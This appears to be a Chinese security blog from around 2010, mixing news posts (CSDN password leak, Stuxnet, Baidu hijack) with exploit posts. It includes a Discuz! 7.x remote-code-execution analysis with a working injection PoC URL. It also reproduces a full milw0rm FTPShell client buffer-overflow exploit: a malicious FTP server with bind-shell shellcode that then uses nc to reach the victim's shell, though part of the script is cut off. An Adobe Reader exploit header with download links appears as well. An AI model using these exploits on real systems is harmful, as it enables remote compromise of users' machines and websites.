年前总有新闻,这次是重大安全新闻。
号称中国最大的开发者技术社区“中国软件开发联盟”(CSDN)数据库被黑了。根据公开的消息有600余万个明文的注册邮箱帐号和密码被黑客公开。
传送门:CSDN泄露账号信息查询
阅读更多…
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/879
网络技术, 外贸知识, 网络安全博客, 外贸博客
Yesterday is history, tomorrow is mystery, and today is a gift, that is why it is called Present!
年前总有新闻,这次是重大安全新闻。
号称中国最大的开发者技术社区“中国软件开发联盟”(CSDN)数据库被黑了。根据公开的消息有600余万个明文的注册邮箱帐号和密码被黑客公开。
传送门:CSDN泄露账号信息查询
阅读更多…
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/879
新闻来源:科技日报
据英国《每日邮报》9月25日(北京时间)报道,日前,世界上首个网络“超级武器”,一种名为Stuxnet的计算机病毒已经感染了全球超过45000个网络,伊朗遭到的攻击最为严重,60%的个人电脑感染了这种病毒。计算机安防专家认为,该病毒是有史以来最高端的“蠕虫”病毒,其目的可能是要攻击伊朗的布什尔核电站。布什尔核电站目前正在装备核燃料,按照计划,它本应在今年8月开始运行。
“蠕虫”是一种典型的计算机病毒,它能自我复制,并将副本通过网络传输,任何一台个人电脑只要和染毒电脑相连,就会被感染。这种Stuxnet病毒于今年6月首次被检测出来,是第一个专门攻击真实世界中基础设施的“蠕虫”病毒,比如发电站和水厂。目前互联网安全专家对此表示担心。
一些专家认为,Stuxnet病毒是专门设计来攻击伊朗重要工业设施的,包括上个月竣工的布什尔核电站。它在入侵一台个人电脑后,会寻找广泛用于控制工业系统如工厂、发电站自动运行的一种西门子软件。它通过对软件重新编程实施攻击,给机器编一个新程序,或输入潜伏极大风险的指令。专家指出,病毒能控制关键过程并开启一连串执行程序,最终导致整个系统自我毁灭。
阅读更多…
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/836
超级猛料,今天百度被黑!
秋天在第一时间收集了不同地方的百度首页截图。
截止目前,国内多处地方出现了百度首页不能正常打开的问题,而部分地区可以正常访问。
据分析可能是由于域名解析问题所致,使用IP仍然可以访问百度首页:
http://202.108.22.5/
2010-01-12 13:09更新:
百毒已经可以正常访问,但旗下的空间等产品栏目仍存在访问故障。
已经有伊朗网站遭到国内黑客攻击,上图:
真杯具,我相信是有人或者组织利用了REGISTER.COM的程序漏洞来恶意挑拨中国和伊朗的关系。曾经跟伊朗人打过交道,他们是把我们当兄弟看的,所谓的”伊朗网络军“来攻击百毒根本不合逻辑。
2010-01-12 14:22更新,更多伊朗被黑网站:
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/11
有一段时间没发布安全新闻了,昨天Discuz!程序爆出高危漏洞,主要存在于7.1&7.2版本论坛程序中,请各论坛站长关注。
据了解,昨日晚些时候一民间安全组织t00ls的成员发现了Discuz!最新版本的高危漏洞,该漏洞可导致直接获得WEBSHELL,目前使用Discuz7.2版本的站点不在少数,目前官方还未有补丁,站长们可按照oldjun的发布的修补方案进行临时修复。黑客X档案等一些使用discuz!最新版的论坛都一度被攻击进而无法访问。
详细漏洞说明(原始出处在这里)
首先说一下,漏洞是t00ls核心群传出去的,xhming先去读的,然后我后来读的,读出来的都是代码执行,1月5日夜里11点多钟,在核心群的黑客们的要求下,xhming给了个poc,我给了个exp,确实发现的是同一个问题。截止夜里2点多种我下线,还只有t00ls核心群里几个人知道我给出的exp,可我怎么也想不到,经过半天时间,exp就满天飞了,而且确实出自昨天我的那个版本。
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。
漏洞介绍:
Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:
一、漏洞来自showmessage函数:
if(!defined(‘STAT_DISABLED’) && STAT_ID > 0 && !IS_ROBOT) {
write_statlog($message);
}
if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward[‘quick’] && $msgforward[‘messages’] && @in_array($message, $msgforward[‘messages’]))) {
updatesession();
dheader(“location: “.str_replace(‘&’, ‘&’, $url_forward));
}
if(!empty($infloat)) {
if($extra) {
$messagehandle = $extra;
}
$extra = ”;
}
if(in_array($extra, array(‘HALTED’, ‘NOPERM’))) {
$discuz_action = 254;
} else {
$discuz_action = 255;
}
include language(‘messages’);
$vars = explode(‘:’, $message);//只要含:就可以了
if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//两个数字即可,用:分割
eval(“\$show_message = \””.str_replace(‘”‘, ‘\”‘, $scriptlang[$vars[0]][$vars[1]]).”\”;”);//$scriptlang未初始化,可以自定义,from www.oldjun.com
} elseif(isset($language[$message])) {
$pre = $inajax ? ‘ajax_’ : ”;
eval(“\$show_message = \””.(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message]).”\”;”);
unset($pre);
}
……
}
<
br/> 二、DZ的全局机制导致了未初始化的参数可以任意提交:
三、misc.php正好有个可以自定义message的点,其实也是未初始化:
if(isemail($id)) {
$msn = $db->result_first(“Select msn FROM {$tablepre}memberfields Where uid=’$discuz_uid'”);
$msn = explode(“\t”, $msn);
$id = dhtmlspecialchars(substr($id, 0, strpos($id, ‘@’)));
$msn = “$msn[0]\t$id”;
$db->query(“Update {$tablepre}memberfields SET msn=’$msn’ Where uid=’$discuz_uid'”);
showmessage(‘msn_binding_succeed’, ‘memcp.php’);
} else {
if($result == ‘Declined’) {
dheader(“Location: memcp.php”);
} else {
showmessage($response[‘result’]);//$response没有初始化,可以自定义,from www.oldjun.com
}
}
}
四、漏洞利用:
showmessage函数里$vars = explode(‘:’, $message);然后message可以自己控制,于是就很容易了,参数是两个自定义的数组。
五、漏洞修复:
官方补丁已经放出,下载地址:
Discuz! 7.1:http://download2.comsenz.com/Discuz/patch/7.1/D710_UPGRADE_TO_20100110.zip
Discuz! 7.2:http://download.comsenz.com/Discuz/patch/7.2/D720_UPGRADE_TO_20100110.zip
poc:
(应Saiy的要求,不发exp了!)注册一个用户登陆,然后提交
misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/14
有一段时间没更新安全方面的文章了,因为自9月下旬以来以来MilW0rm就再也没有更新。今天来一篇关于IE7的。对安全没有兴趣的同学可以直接无视飘过。
漏洞名称:Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞(可以执行任意代码)
漏洞介绍:在XHTML 1.0标准下,使用特殊构造的CSS样式,在Internet Explorer 7.0 打开特定的网页后,Internet Explorer 7.0将发生内存崩溃,EIP指针将访问 0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码,就可以执行任意命令!!
漏洞危害:黑客如果将含有“漏洞利用程序的网页”置于网站上,浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
此漏洞由国内某安全公司发现,在附件的poc中你能找到名称。
由于包含恶意代码,为了不由于防病毒软件的告警而影响大家阅读本文,具体的poc文档放在附件中。
Microsoft Internet Explorer 7.0 异常CSS导致内存破坏漏洞细节(POC)
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/41
FTPShell客户端4.1 RC2通杀远程缓冲区溢出漏洞
测试通过平台:xp_sp3,w2k_sp4
#—exploit-log—
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response…
#[+] Done, wait for trying to connect to port 4444 on the target…
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\victim\Desktop>
from socket import *
import os
import time
# win32_bind – EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
stage2 =(
"\x44\x7A\x32\x37\x44\x7A\x32\x37"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57"
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
"\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36"
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57"
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51"
"\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36"
"\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32"
"\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46"
"\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")
stage1=(
#
buffer = stage1 #<———————————|
buffer += '\x41'*(412-len(stage1)) # |
buffer += '\xC5\xB3\x43\x00' # add esp,8;retn—-|
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 21))
s.listen(1)
print "
[+] Listening on [FTP] 21"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.send("220 Hey victim batet fik!\r\n")
c.recv(1024)
time.sleep(0.5)
c.send("331 User anonymous OK Password required\r\n")
c.recv(1024)
time.sleep(0.5)
c.send("230 Ok.\r\n")
c.recv(1024)
# Enable this when client performs CWD command
#time.sleep(1)
#c.send("250 CWD command successful.\r\n")
#c.recv(1024)
time.sleep(0.5)
c.send("257 \x22/\x22 is current directory\r\n")
c.recv(1024)
time.sleep(0.5)
c.send("200 Type set to A.\r\n")
c.recv(1024)
time.sleep(0.5)
print "[+] Sending the malicious pasv response…"
c.send("227 "+stage2+"\r\n"
"227 Entering Passive Mode ("+buffer+").\r\n"
"\r\n")
time.sleep(2)
c.close()
s.close()
print("[+] Done, wait for trying to connect to the target on port 4444…\n")
time.sleep(25)
os.system("nc -nv "+addr[0]+" 4444")
# milw0rm.com [2009-09-09]
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/91
Adobe Acrobat Reader Collab getIcon通杀漏洞
evil_pdf.py在以下系统测试通过:
Windows XP SP3 英文版/法文版
Windows 2003 SP2 英文版
Adobe 应用程序版本:
Adobe Reader 9.0.0/8.1.2 英文版/法文版
测试对象:
单独PDF文件、火狐FireFox3.0.13和IE7嵌入式PDF
#!/usr/bin/env python
#
# *** Acrobat Reader – Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 – Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#
http://www.coromputer.net/CVE-2009-0927_package.zip
back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip
# milw0rm.com [2009-09-03]
转载请尊重版权,出处:秋天博客 本文链接: https://www.cfresh.net/web-security/95